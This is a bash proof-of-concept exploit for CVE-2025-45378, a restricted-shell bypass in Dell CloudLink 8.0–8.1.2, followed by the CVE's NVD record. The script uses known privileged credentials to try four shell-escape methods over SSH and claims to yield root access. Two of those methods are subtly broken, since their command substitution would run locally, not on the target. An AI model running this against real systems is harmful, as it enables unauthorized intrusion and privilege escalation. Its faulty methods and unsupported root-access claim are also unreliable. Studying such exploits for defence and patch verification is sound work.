CVE-2025-45378

#!/bin/bash # CVE-2025-45378 PoC - Dell CloudLink Restricted Shell Bypass # Requires valid privileged user credentials HOST="target_dell_cloudlink_ip" USERNAME="privileged_user" PASSWORD="known_password" # Method 1: Shell escape using command separator echo "[*] Attempting restricted shell bypass..." ssh ${USERNAME}@${HOST} ";bash -i" # Method 2: Using environment variables echo "[*] Trying environment variable escape..." ssh ${USERNAME}@${HOST} "$(bash -c 'bash -i')" # Method 3: Using backticks for command substitution echo "[*] Attempting command substitution..." ssh ${USERNAME}@${HOST} "`/bin/bash -i`" # Method 4: Using expect script for interactive bypass expect <<EOF spawn ssh ${USERNAME}@${HOST} expect "password:" send "${PASSWORD}\r" expect "$" send ";bash -i\r" interact EOF echo "[*] If successful, you now have root shell access"

{"cve": {"id": "CVE-2025-45378", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:41.213", "lastModified": "2025-11-07T17:52:11.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudLink, versions 8.0 through 8.1.2, contain vulnerability on restricted shell. A Privileged user with known password can break into command shell of CloudLink server and gain access of shell and escalate privilege, gain unauthorized access of system.\n\nIf ssh is enabled with web credentials of server, attack is possible through network with known privileged user/password."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0", "versionEndIncluding": "8.1.2", "matchCriteriaId": "E35E706F-79EB-4658-8A92-DE070D649BA9"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}